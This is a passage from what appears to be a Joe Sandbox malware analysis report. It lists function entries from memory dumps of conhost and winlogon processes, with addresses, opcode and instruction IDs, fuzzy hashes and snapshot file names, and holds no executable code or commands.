                                                                                                • Opcode ID: 4a50f83341a01f37ef2b5baf24b4aada6efe849e03db9de877caf255af67b747
                                                                                                • Instruction ID: 3c9cb42013c070cd61bf2fd63e5f2e7638b65c3cb84bac9127d66fb0e4f0ff17
                                                                                                • Opcode Fuzzy Hash: 4a50f83341a01f37ef2b5baf24b4aada6efe849e03db9de877caf255af67b747
                                                                                                • Instruction Fuzzy Hash: E9C0C910F2A42D96EAA8A3B584211FC80D29B49700B520478D04DD31E2DC1969004E84
                                                                                                Function 00007FFD9B8B6802 Relevance: .0, Instructions: 10COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 66c5ad7b955d66629afdb2344a6aa6bf7186fdcac4a69a8903ef197fd03b6da0
                                                                                                • Instruction ID: 1c546510ca24c66eac6b75310a345f12fe0367802b7919b791db1d0c77aaedfd
                                                                                                • Opcode Fuzzy Hash: 66c5ad7b955d66629afdb2344a6aa6bf7186fdcac4a69a8903ef197fd03b6da0
                                                                                                • Instruction Fuzzy Hash: 78C04C15F29C2A57E36A622848316BD04A29B44754F95007CE41D9B6DECD1C5E0216C7
                                                                                                Function 00007FFD9B8B06C8 Relevance: .0, Instructions: 8COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                                                                • Instruction ID: 63218d0c2e49ba43bc485c3db5fe95adfdcbe6a455a01f28a2e979715c15fde4
                                                                                                • Opcode Fuzzy Hash: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                                                                • Instruction Fuzzy Hash: 90B01200D6B45F00E42833FB08520647440AF4C104FC20070D44C80191984D229406C2

                                                                                                Non-executed Functions

                                                                                                Function 00007FFD9B8B09B0 Relevance: 5.2, Strings: 4, Instructions: 187COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: c9$!k9$"s9$#{9
                                                                                                • API String ID: 0-1692736845
                                                                                                • Opcode ID: 71d326ceebd15b301eb1fb1730b87dfcc78a94d6bfac99c4088267545aad56a9
                                                                                                • Instruction ID: 59ac16040a37b55d1682a8a5f16e21fb3a452759f4ae20953ca4ad1d0b06e41e
                                                                                                • Opcode Fuzzy Hash: 71d326ceebd15b301eb1fb1730b87dfcc78a94d6bfac99c4088267545aad56a9
                                                                                                • Instruction Fuzzy Hash: 7C51D082B1943785E31F33FD792A8FC6B44DF45379B4846B3E05E8A0EB5C88608392E5

                                                                                                Executed Functions

                                                                                                Function 00007FFD9B870D4C Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 5\_H
                                                                                                • API String ID: 0-3325266018
                                                                                                • Opcode ID: f7bc40702c86c09de912bae084baf116a9af870468519a6fc8df88420a2a0bc3
                                                                                                • Instruction ID: a22d808c4e0c7548f705e8031e72b2cefc2422ea6fbc55987b1b6a2ff7786963
                                                                                                • Opcode Fuzzy Hash: f7bc40702c86c09de912bae084baf116a9af870468519a6fc8df88420a2a0bc3
                                                                                                • Instruction Fuzzy Hash: 98912571A1DA8D8FE759DF688865BA97FE0FF59314F0400BED019D73E6DAB824018750
                                                                                                Function 00007FFD9B8708D0 Relevance: .2, Instructions: 161COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 429a53fa1a50729638d547db63c9501c63be37b5d37372fd660d4f5a7ca7d9f3
                                                                                                • Instruction ID: f7a616dd5c580cf885e20b860530a99bcb682be598d1012618f1cbc2d9b70b21
                                                                                                • Opcode Fuzzy Hash: 429a53fa1a50729638d547db63c9501c63be37b5d37372fd660d4f5a7ca7d9f3
                                                                                                • Instruction Fuzzy Hash: E7415C12B0D5695EE309B7B874EA6FD7B91DF49328B0404FBD04DCB1EBDD1864428281
                                                                                                Function 00007FFD9B870910 Relevance: .2, Instructions: 150COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ae177c3c5c70837ed0ccd755c975fa9fdadef5038ec7b3ade0a8a9a27d7997a7
                                                                                                • Instruction ID: 3cc5a366d0f0172a739f796cea47694d90eb1e989b50fb6a9b7fb947ad31c735
                                                                                                • Opcode Fuzzy Hash: ae177c3c5c70837ed0ccd755c975fa9fdadef5038ec7b3ade0a8a9a27d7997a7
                                                                                                • Instruction Fuzzy Hash: 3E413A12B0D5695EE309B7B874EA5FC7B91DF49328B0444FBD04ECB1EBDD18A8428281
                                                                                                Function 00007FFD9B870960 Relevance: .1, Instructions: 115COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d8d16a52bf548df697f64cb3916979726ce2736e49b9fad0fda673e8e26e92e4
                                                                                                • Instruction ID: 9859deb5f477de1214fb34e5c8a522b7b3b0cc65a21b283ae4304acd9a25a785
                                                                                                • Opcode Fuzzy Hash: d8d16a52bf548df697f64cb3916979726ce2736e49b9fad0fda673e8e26e92e4
                                                                                                • Instruction Fuzzy Hash: F9310811B1D5291FE358B7B878AE6B977C1DF48329B0400FED40EC71EBDC1CA8414291
                                                                                                Function 00007FFD9B871171 Relevance: .1, Instructions: 107COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d26e5ef3d27cd0452ee787ce9726305cf5dc833e00a874a70b4203b28df26b40
                                                                                                • Instruction ID: c5467112f5159f126f212e6800bab22a6f09bc884a0f9d664e17b7544303d446
                                                                                                • Opcode Fuzzy Hash: d26e5ef3d27cd0452ee787ce9726305cf5dc833e00a874a70b4203b28df26b40
                                                                                                • Instruction Fuzzy Hash: 5331F830A1E68E8FDF55EBB4C8A59A97BF0FF1A310B0905FAC009CB1A3DA385941C740
                                                                                                Function 00007FFD9B870998 Relevance: .1, Instructions: 104COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 01c343098ba38396a139132f4a55025d8880cffc694d959c9beb32ba3ae6b8a7
                                                                                                • Instruction ID: 5ab43c0a378e8752fe8c0736e1748f81de64fb171fa3d27a084aa929b1ee0803
                                                                                                • Opcode Fuzzy Hash: 01c343098ba38396a139132f4a55025d8880cffc694d959c9beb32ba3ae6b8a7
                                                                                                • Instruction Fuzzy Hash: 2D310A20B1D95D1FE798F76884AEA7977D2EF98315B0400BDD80EC72FBDD28A9418391
                                                                                                Function 00007FFD9B870C25 Relevance: .1, Instructions: 88COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 84c63fe50589cc35d4e53b96c742fce3415e5f75fc1e870a0bdbca15d7707404
                                                                                                • Instruction ID: 8405e861789c33c274e4c8a4657d2a6e50590c952a2b30489373b03bc59eaf27
                                                                                                • Opcode Fuzzy Hash: 84c63fe50589cc35d4e53b96c742fce3415e5f75fc1e870a0bdbca15d7707404
                                                                                                • Instruction Fuzzy Hash: 50214B32F1D2598EFB26A7E898A94EC3B60DF96328F1541B3D048CB1D3D9382647A351
                                                                                                Function 00007FFD9B874C51 Relevance: .1, Instructions: 85COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 58f38d80244e1fc81a6835145e6d15e71dc2ae30582d28ffb1273454c8233996
                                                                                                • Instruction ID: c25940a3119c82907be8617c8d22e04028772a826bd2e18544c67a04a8365bf2
                                                                                                • Opcode Fuzzy Hash: 58f38d80244e1fc81a6835145e6d15e71dc2ae30582d28ffb1273454c8233996
                                                                                                • Instruction Fuzzy Hash: AE314D31E1851D8FEB64EB54C8A47AD72A1FB5C324F1501BDD41ED32E1CA396E80DB41
                                                                                                Function 00007FFD9B872B87 Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 406c0320ee0fa3ec982233ccb0021b39c1ae103a52350120466acd4e6564ae2a
                                                                                                • Instruction ID: e035278ca2e6b957d42e7fbb1474e90e601fa21ccb1b4d4ac3856f0f0625e202
                                                                                                • Opcode Fuzzy Hash: 406c0320ee0fa3ec982233ccb0021b39c1ae103a52350120466acd4e6564ae2a
                                                                                                • Instruction Fuzzy Hash: 8B111220B1A90E4FEBF4EFD488E97B87291EF5D304F5500B9D40DD72B2DE28AA44A700
                                                                                                Function 00007FFD9B870C40 Relevance: .1, Instructions: 52COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 95eca61ae06e1b84621d1994add1f61b943c9eaa11c604726877cc3372543f82
                                                                                                • Instruction ID: ed994b05953bf7d4678f6d074afaad6c017ef86e0098485581d98341a796a899
                                                                                                • Opcode Fuzzy Hash: 95eca61ae06e1b84621d1994add1f61b943c9eaa11c604726877cc3372543f82
                                                                                                • Instruction Fuzzy Hash: 5511C231E1E28D8FEB12DBA888A409C7BB0EF56718F0641F7C044DB2E2D93867469740
                                                                                                Function 00007FFD9B872C52 Relevance: .0, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fcbb7afc1ac5306dee0586f071aa919c658eee4105b8a47b8cc361170641753e
                                                                                                • Instruction ID: 061cb223194e62f4ed238f70b2fd3a81ab316c25ee5288e3c9c1a81b46a511bc
                                                                                                • Opcode Fuzzy Hash: fcbb7afc1ac5306dee0586f071aa919c658eee4105b8a47b8cc361170641753e
                                                                                                • Instruction Fuzzy Hash: 73017521B1E90D8BEB74EFA4C8E867833D1DB99754F1601B5D409C32B2DD18AA41A640
                                                                                                Function 00007FFD9B870C48 Relevance: .0, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c87cf6cf402f2026c023dde047bfe10f691ac85107b3be7e00946141743bb911
                                                                                                • Instruction ID: f5275dc1af9d989ef1c5a77a987fe378075a5d3503d4271f60362026de8e3194
                                                                                                • Opcode Fuzzy Hash: c87cf6cf402f2026c023dde047bfe10f691ac85107b3be7e00946141743bb911
                                                                                                • Instruction Fuzzy Hash: 64018431E1E28D8FEB16DBA4889409C7FB0EF56718F1641F7D044DB2A2D9346B459740
                                                                                                Function 00007FFD9B870C50 Relevance: .0, Instructions: 41COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 52dcdc1f4efd119f30c991693d070b735241efe8fc0eac214022275935244ec4
                                                                                                • Instruction ID: 5ec400ddd78b276b115b59f568eb757ad9a1ba3ab29d299c6fbe56a9cee7fe54
                                                                                                • Opcode Fuzzy Hash: 52dcdc1f4efd119f30c991693d070b735241efe8fc0eac214022275935244ec4
                                                                                                • Instruction Fuzzy Hash: 0801B130E1E28D8FEB22DBA488A409C7FB0EF56718F1541F7C044CB2A2D9386B459740
                                                                                                Function 00007FFD9B870B77 Relevance: .0, Instructions: 35COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d91682916318c10d113a3096e9fa26cff47e54ad1401a3c9d54320f18d716664
                                                                                                • Instruction ID: efe46148ef7853da4e3efff42a9fc97cc7ce4a9b0bbed6b35a336796540a689c
                                                                                                • Opcode Fuzzy Hash: d91682916318c10d113a3096e9fa26cff47e54ad1401a3c9d54320f18d716664
                                                                                                • Instruction Fuzzy Hash: B3F0E53660D6498FC346DB79D8958D83B60EB87225B9B11FAD089CB562C628185FCB10
                                                                                                Function 00007FFD9B872C9D Relevance: .0, Instructions: 35COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b6e0be89d3b27c2fa4f56752da0536672b2e1be42a0abed2b0df82e3ba76eaa2
                                                                                                • Instruction ID: 10d827341ee91ea56d3ae50cda7fa521b888a394f3229df113d3c901917ea16b
                                                                                                • Opcode Fuzzy Hash: b6e0be89d3b27c2fa4f56752da0536672b2e1be42a0abed2b0df82e3ba76eaa2
                                                                                                • Instruction Fuzzy Hash: 0EF0F430A1A90E8BEBB4FFD0CCE86B87361EB59315F510179C409D72B1CE286A85E700
                                                                                                Function 00007FFD9B871DE1 Relevance: .0, Instructions: 30COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 57fb183041b110d4686c7a33090f71ae210a68548656d392bed85e97e3ba1616
                                                                                                • Instruction ID: 8a2cbaaea7394f8023e752e5dffff168df1abf3b643ca53cd751d9d3988802c9
                                                                                                • Opcode Fuzzy Hash: 57fb183041b110d4686c7a33090f71ae210a68548656d392bed85e97e3ba1616
                                                                                                • Instruction Fuzzy Hash: E2F03061F2A52E4AFBB0F79484E53B812D1EB58718F160071D40DD36A1CD2CBE816641
                                                                                                Function 00007FFD9B872BC6 Relevance: .0, Instructions: 30COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8c0c53da2c1fdb609a134df8646e88899382bc2d5736a2a9e3705598f2c545c1
                                                                                                • Instruction ID: e10ec4e9c5503c345cfbb717104c245d7d2b5aeebccf76ea613cdf934fce1a40
                                                                                                • Opcode Fuzzy Hash: 8c0c53da2c1fdb609a134df8646e88899382bc2d5736a2a9e3705598f2c545c1
                                                                                                • Instruction Fuzzy Hash: 6DF0D020B1A90D8BEBB0EF94CCE87B93351EB99315F1141B9C509D72B2CD296E45A640
                                                                                                Function 00007FFD9B870D02 Relevance: .0, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e0becc60fbb555da57209a187df53f1161c41a895e556b4b150b3f50e21c9b36
                                                                                                • Instruction ID: 4f86acd6e2d2c567f542e6e90b9aee3215768a906aac7fc036d038f93d12bf5e
                                                                                                • Opcode Fuzzy Hash: e0becc60fbb555da57209a187df53f1161c41a895e556b4b150b3f50e21c9b36
                                                                                                • Instruction Fuzzy Hash: 83F0BB30B19209CFEB54DB9884956B977E0EB68715F14427AD009C32D5DD7866848B40
                                                                                                Function 00007FFD9B8729F8 Relevance: .0, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: caadf791f098249168f39ca8af5712f15652d170467534120b8f81d17c7e307b
                                                                                                • Instruction ID: d44fdac9d246ae821b3dcfe5f8e321f95e32558b6620320b7d13cafcd28480cd
                                                                                                • Opcode Fuzzy Hash: caadf791f098249168f39ca8af5712f15652d170467534120b8f81d17c7e307b
                                                                                                • Instruction Fuzzy Hash: 88E09261F2A82E0FE7E4FB9880E6BB826D1EB5C748F020035D40DC32B5CD1C6E816740
                                                                                                Function 00007FFD9B875A16 Relevance: .0, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: adfe7e4a30274407390290cff2248b20d5ee7c04e6f36ead1793e514b745e033
                                                                                                • Instruction ID: 282d5f07f1f5cf94f71494921f9c881ece4cef1b070761125aa9bcaa5232e07c
                                                                                                • Opcode Fuzzy Hash: adfe7e4a30274407390290cff2248b20d5ee7c04e6f36ead1793e514b745e033
                                                                                                • Instruction Fuzzy Hash: 83E0DF71E2982A0BEBA0FB5884D66F427C1E758748F510172D81DC33A1DE28AE822780
                                                                                                Function 00007FFD9B871295 Relevance: .0, Instructions: 16COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 083fb0e1b5eb4034aa05746634e0b5fc8e041cd631a47bd32383e22a894361f8
                                                                                                • Instruction ID: ed9529641989c2f7acb318b5dd2709dc394a8e0782a8b0b415e8b46ff1b4926b
                                                                                                • Opcode Fuzzy Hash: 083fb0e1b5eb4034aa05746634e0b5fc8e041cd631a47bd32383e22a894361f8
                                                                                                • Instruction Fuzzy Hash: 0DC01214B5740A61D12873B9FCA64E97750DF4921CBC54071E00D82096DC4A1587A196
                                                                                                Function 00007FFD9B8706A5 Relevance: .0, Instructions: 13COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 607a3deceb6852d5288b94f2c8b9b075914afb68c719db66ca5244cb50052f0a
                                                                                                • Instruction ID: 890f846989076c02f2dd31ff3e582fcc8035300bf9e0f6e5094c3cd04cb09e05
                                                                                                • Opcode Fuzzy Hash: 607a3deceb6852d5288b94f2c8b9b075914afb68c719db66ca5244cb50052f0a
                                                                                                • Instruction Fuzzy Hash: B8C01200F2B60E00EC20B3AA98B60ACA101EBCCA18FE60032C048820E1984D22852186
                                                                                                Function 00007FFD9B8712B8 Relevance: .0, Instructions: 12COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2118bf5cbd7652e4d7e413182c64878a5aedab47cc3b41951ae0b3348f6e1aca
                                                                                                • Instruction ID: a9a10db89173ad201e815347b13bef5a7046ac1db6afea8b0f1894586ebe6127
                                                                                                • Opcode Fuzzy Hash: 2118bf5cbd7652e4d7e413182c64878a5aedab47cc3b41951ae0b3348f6e1aca
                                                                                                • Instruction Fuzzy Hash: E6C08C3061180C8FC908FB28C88480433A0FB0E204BC200E0E009C7170D229DCC0C740
                                                                                                Function 00007FFD9B873DB4 Relevance: .0, Instructions: 11COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3e366cf611c73723ccd51d3ba29b440df38dbb3f2ccf2f500884b325ea9f3d3f
                                                                                                • Instruction ID: 94bdfc8957f5f5068de8a8b4a21def44d55ede8d365c0dd2fffaa695a2a503aa
                                                                                                • Opcode Fuzzy Hash: 3e366cf611c73723ccd51d3ba29b440df38dbb3f2ccf2f500884b325ea9f3d3f
                                                                                                • Instruction Fuzzy Hash: 88C01220F2A80E8AEEF8F3B484B22FC00C2DF4CB48F420034D05ED32E2DC1D6A006A40
                                                                                                Function 00007FFD9B876802 Relevance: .0, Instructions: 10COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ecba0402593ce2ed89c736390c08c3df981dca5cfe576004e307757652cdee84
                                                                                                • Instruction ID: 6f955bca666ff70aa740885da1367ab88b3e12c45766aea4294d831d40694e79
                                                                                                • Opcode Fuzzy Hash: ecba0402593ce2ed89c736390c08c3df981dca5cfe576004e307757652cdee84
                                                                                                • Instruction Fuzzy Hash: 1DC04C14F19C2A4BE3696614483167D0492DB54B58F950074E41D976DECD5C6A0212C7
                                                                                                Function 00007FFD9B8706C8 Relevance: .0, Instructions: 8COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                                                                • Instruction ID: 67853c57e0e0e3935bb7279b2539a26b6438864ccae4a5488d5e5c429a9a83bb
